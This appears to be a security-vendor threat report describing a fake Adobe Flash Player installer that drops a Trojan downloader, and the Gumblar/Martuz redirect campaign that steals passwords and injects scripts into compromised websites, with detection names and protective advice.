Cybercriminals have long used videos as a lure to get unknowing users to download and install malware onto their systems. Recently, however, a new variant came up that differs just a little from the usual modus operandi.

TROJ_SMALL.UY, at first glance, appears to be a fairly standard malware that’s installed by claiming it’s needed for a video. There’s one difference, though: TROJ_SMALL.UY, which poses as an installer for Adobe Flash Player, does appear to actually install Adobe Flash Player.

In fact, TROJ_SMALL.UY goes to a fair amount of trouble to look like a legitimate program. Consider, first of all, the page where it can be downloaded from:

Whoever was behind this Trojan went to a lot of effort to replicate the look and feel of the real Adobe site, and even used a domain name very close to the word Adobe.

The same is true for the installer:

Similarly, some effort has been made here to replicate a legitimate Windows installer. It wouldn’t be too hard to conclude that this was a legitimate installer for Adobe Flash Player. It even adds an uninstaller in the Control Panel, after all!

While TROJ_SMALL.UY may indeed install Adobe Flash Player, something extra is along for the party: it also drops a DLL file that’s detected as TROJ_DLOADER.ZEK. As this is a Trojan downloader, as a practical matter this means that the field is wide open to any malware threat.

While the website hosting this modified Flash Player is already blocked through the Smart Protection Network, it’s doubtful this is the last we’ll see of this particular threat.

Gumblar.{BLOCKED}, the domain to which visitors of reported compromised websites were directed to was taken down, only to be replaced by a new one: Martuz.{BLOCKED}.

In an attack which quickly garnered much attention in the security industry, visiting compromised websites were found to redirect the user to Martuz.{BLOCKED}, which leads to a download of a file in users’ systems. It then uses Adobe PDF and Flash player vulnerabilities to gain system access. Once installed, the malware is able to steal stored passwords, which it delivers back to its creators via FTP. These stolen passwords may ultimately lead to the unauthorized tampering of the user’s web server files, wherein obfuscated JavaScript is inserted into several files. The vandalized pages containing the JavaScript now become the malware author’s newest redirectors, continuing the vicious cycle of information stealing. Additionally, the malicious file poisons the results of Google searches conducted by the user of the affected system, thus leading them to more malicious domains.

Our engineers are still in the process of analyzing the said malicious file. In the meantime, Trend Micro detects the redirecting scripts as HTML_JSREDIR.AE and HTML_REDIR.AC. Injected scripts vary for each infected page, and the exact epicenter of the attack is still yet to be determined.

Using a browser other than Internet Explorer may help minimize the risk of getting infected, and updating software to address vulnerabilities is a must. Site owners should do an immediate cleanup if an infection is detected, and passwords should be changed as soon as possible.